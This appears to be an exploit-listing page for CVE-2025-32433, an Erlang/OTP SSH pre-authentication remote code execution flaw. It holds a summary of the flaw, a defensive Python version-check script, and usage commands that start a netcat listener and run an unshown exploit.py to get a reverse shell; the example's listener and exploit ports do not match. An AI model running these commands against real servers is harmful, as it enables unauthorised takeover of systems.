## https://sploitus.com/exploit?id=8D8EEF4D-1DC7-5A96-8EBB-A5DBA9A02C8D
# CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview

CVE-2025-32433 is a critical unauthenticated remote code execution (RCE) vulnerability in the Erlang/OTP SSH server, disclosed on April 16, 2025. Erlang/OTP SSH is a library used in various distributed and telecom applications. The flaw arises from improper handling of SSH protocol messages: the server fails to enforce the normal authentication sequence, allowing an attacker to send specially crafted SSH messages before authentication. By doing so, the attacker can inject and execute arbitrary Erlang code on the server (nvd.nist.gov, offsec.com). In practical terms, this means an attacker with network access to a vulnerable Erlang/OTP SSH server (often running as root) can trigger a reverse shell or execute commands without any credentials, leading to full system compromise (nvd.nist.gov, offsec.com). This vulnerability is assigned CVSS 10.0 (maximum severity) (offsec.com).

Affected versions are all Erlang/OTP releases below OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (the patched versions) (nvd.nist.gov, offsec.com). Affected systems often include Linux servers or appliances running an Erlang-based SSH daemon (not to be confused with OpenSSH). Importantly, default OpenSSH servers on Linux/BSD are not vulnerable (offsec.com). Users should assume any exposed Erlang/OTP SSH server is affected, and apply the official patches or disable the SSH service immediately.
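A small version check that applies the patched-release thresholds above to an installed OTP version string, so a defender can triage hosts quickly. This is an added example and not code from the exploit repository; it assumes the version string is obtained from the host (for example from the OTP_VERSION file under the OTP install's releases directory) and that releases on branches older than 25 received no fix while 28 and later postdate it.

```python
"""Classify an Erlang/OTP version string against the CVE-2025-32433 fix thresholds."""
import re

# Fixed releases from the advisory: anything below these on the same branch is affected.
PATCHED = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}


def parse_otp_version(text):
    """Parse 'OTP-26.2.5.10' or '26.2.5.10' into a tuple of ints, e.g. (26, 2, 5, 10)."""
    match = re.search(r"(?:OTP-)?(\d+(?:\.\d+)*)", text.strip())
    if not match:
        raise ValueError(f"unrecognised OTP version: {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable(text):
    """True if the given OTP release is below the patched release for its branch."""
    version = parse_otp_version(text)
    major = version[0]
    if major in PATCHED:
        # Tuple comparison handles shorter strings: (26, 2, 5) < (26, 2, 5, 11).
        return version < PATCHED[major]
    # Assumption: branches before 25 never got a fix; 28+ shipped after the fix.
    return major < 25


if __name__ == "__main__":
    # Constructed sample inputs, not real host data.
    for sample in ["OTP-27.3.2", "OTP-27.3.3", "OTP-26.2.5.10", "25.3.2.20", "OTP-24.3.4.17"]:
        state = "VULNERABLE" if is_vulnerable(sample) else "patched"
        print(f"{sample:16} {state}")
```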
The attack works by initiating an SSH connection and then sending a sequence of SSH messages out of order, before authentication has completed.

Usage:

```bash
sudo chmod +x exploit.py
nc -nvlp <lport>
python3 exploit.py -t <target-ip> -p 22 --lhost <attacker-ip> --lport <listener-port>
```

Example:

```bash
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555
```